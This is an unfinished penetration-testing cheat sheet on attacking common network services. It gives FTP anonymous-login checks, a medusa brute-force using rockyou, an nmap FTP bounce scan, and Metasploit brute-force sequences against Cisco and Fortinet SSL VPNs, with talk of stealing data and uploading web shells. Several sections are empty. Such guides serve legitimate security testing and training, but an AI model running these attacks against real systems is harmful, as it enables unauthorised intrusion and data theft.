Common Service Attacks
NOTE: This page is under construction
Services
Network services as listed below commonly run standard default ports. Whilst most of your targets (especially internally) may run on default standard ports that you would expect services to run on it's important to look for non-standard, high ports as some sysadmins run their infrastructure under "Security Through Obscurity". To do this we can use third-party services such as Shodan and Censys and port scanners such as nmap.
FTP
File Transfer Protocol (FTP) is commonly used to store and transfer files and runs on port 21 by default. FTP if configured properly cannot be accessed without being vulnerable or using weak credentials. However if the server has misconfigurations (anonymous authentication) and weak credentials are in place then potentially it can be accessed. After which we can login, see if we have write permissions, steal data or upload a web shell to perform further post exploitation and lateral movement.
- FTP Security: https://datatracker.ietf.org/doc/html/rfc2577
- FTP hacking cheat sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp
Basic FTP authentication (CLI):
- Basic FTP login:
ftp 10.10.10.11 21 - Feature rich (CLI) FTP client:
ncftp -u admin -p Password123 10.10.10.11 - A nice feature rich GUI FTP client: https://filezilla-project.org
Anonymous Login
A common security oversight and misconfiguration is an FTP server allowing anonymous login and it becomes even better if we have write permissions! To check for this misconfifration you can either manually try and login with anonymous:anonymous or use the nmap scripting engine to check automatically for you.
Check for FTP anonymous login:
ftp 10.10.10.11(anonymous:anonymous)sudo nmap -sC -sV 10.10.10.11 -p 21 -oA results
Brute-Force
Brute-Force attacks stuff logins with thousands and hundreds of thousands (even millions) of login attempts using a password word list against a user or a list of users guessing the users password until it finds the right one. If we cant get access to the FTP using the anonymous login method and assuming the sysadmin uses weak and guessable credentials we may be able to brute-force the login and break our way in. Note that this is a very loud and proud method and is not recommended if you're trying to be stealthy.
Brute-force using medusa and rockyou:
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.10.11 -M ftp
FTP Bounce
An FTP Bounce attack is an old attack against FTP where we can effectively use the target (hacked) server as a proxy to access other internal systems on the network externally. We can use this method to port scan an internal network however this is by default not available on modern FTP servers but is still worth checking for just in case your target is vulnerable to this attack.
nmap -Pn -v -n -p 80 -b anonymous:anonymous@10.10.10.11 <internal address>
Exfiltration
Once you find your way into an FTP server which has data that you want to exfiltrate on mass you can use wget to mass exfiltrate all the data from the server to your server.
Exfiltrate all data from the target server:
SSH
SMB
RDP
VPN
Virtual Private Networks in the corporate sense (VPNs) are used to connect remotely into the corporations internal network from anywhere outside the network. This allows employees, IT staff, help desk and third parties to connect and access internal resources. We can abuse this trust relationship by either hacking the VPN through common and known vulnerabilities or we can brute-force/password spray looking to find weak and guessable credentials where the accounts don't implement multi-factor authentication.
Vulnerabilities
There are many critical vulnerabilities that affect many different VPNs and we can scan and exploit these vulnerabilities to gain initial access into the network. Here we list some (not all) critical VPN vulnerabilities that are worth scanning for and exploiting.
Brute-Force
For this we can two use metasploit modules for two very common corporate VPNs, one being Fortinet SSL VPN and the other being CISCO.
CISCO
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/cisco_ssl_vpn set RHOSTS file:/home/targets_443.txt set RPORT 443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run
Fortinet SSL VPN
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/fortinet_ssl_vpn set RHOSTS file:/home/targets_10443.txt set RPORT 10443 set USER_FILE /home/users.txt set PASS_FILE /home/pass.txt set threads 10 run